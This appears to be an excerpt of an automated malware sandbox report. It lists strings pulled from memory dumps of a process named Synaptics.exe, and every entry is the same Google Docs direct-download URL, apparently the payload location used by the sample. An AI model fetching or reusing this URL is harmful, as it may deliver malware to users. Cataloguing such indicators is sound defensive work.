Source: Synaptics.exe, 00000006.00000003.1368345628.00000000056AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download97h
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9I
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:/
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1394556016.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1437230556.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;u$
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
Source: Synaptics.exe, 00000006.00000003.1367538076.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?Q
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?z
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBK
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBm
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBus
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1394556016.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1437230556.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC5fKe
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC=
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCoVx
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
Source: Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.0000000005739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD#
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDc
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.00000000070A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1437395638.000000000714F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
Source: Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEn
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadErn
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFz
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG-
Source: Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH=#
Source: Synaptics.exe, 00000006.00000002.1682948410.0000000010FFE000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHml
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
Source: Synaptics.exe, 00000006.00000002.1652445342.0000000002150000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJr
Source: Synaptics.exe, 00000006.00000003.1436494838.000000000709C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.00000000070A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
Source: Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.0000000005739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKK
Source: Synaptics.exe, 00000006.00000003.1392959426.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKP
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKz
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL-
Source: Synaptics.exe, 00000006.00000003.1436494838.000000000709C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1394556016.00000000005D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMH
Source: Synaptics.exe, 00000006.00000003.1436494838.000000000709C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.00000000070A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNz
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1676364464.000000000E7C0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1394556016.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1437230556.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005701000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOS
Source: Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.0000000005739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP#
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPrr
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPz
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ-
Source: Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQn
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRO
Source: Synaptics.exe, 00000006.00000002.1655410702.00000000053DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1669287042.0000000009A3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1669205610.00000000098FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1654442705.0000000004B1E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1668642439.000000000903E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1669455942.0000000009B7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1670210722.000000000A6BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1670460639.000000000A93E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1667335763.0000000007EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1673378268.000000000C9BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1672446385.000000000BE7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1678974963.000000000E8E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1672542534.000000000BFBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1671094609.000000000AF7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1668293691.0000000008B3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1660606731.0000000005DAE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1669944529.000000000A2FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655294386.000000000529E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1666956064.0000000007AFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1668461549.0000000008DBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1668565277.0000000008EFE000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
Source: Synaptics.exe, 00000006.00000002.1667980632.000000000863E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1671735193.000000000B6FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1671889105.000000000B83E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1660255682.0000000005B2E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1671451546.000000000B33E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1668068158.000000000877E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1671532140.000000000B47E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1667809161.00000000083BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1671631685.000000000B5BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1671997356.000000000B97E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1654657851.0000000004C5E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1654814949.0000000004D9E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1666836152.00000000079BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1667894380.00000000084FE000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS%%
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSan
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1394556016.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1437230556.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSg
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
Source: Synaptics.exe, 00000006.00000003.1368345628.00000000056AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.00000000056AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU74
Source: Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUI
Source: Synaptics.exe, 00000006.00000002.1678974963.000000000E8E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUSq
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUnive
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV/
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVK
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
Source: Synaptics.exe, 00000006.00000003.1367538076.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWQ
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWux
Source: Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
Source: Synaptics.exe, 00000006.00000003.1368345628.00000000056AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.00000000056AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ7I
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZI
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZz
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.0000000005717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.00000000070A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1394556016.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1437230556.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.000000000572D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005701000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_R
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_r
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1394556016.00000000005D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
Source: Synaptics.exe, 00000006.00000003.1368345628.00000000056AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.00000000056AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada7
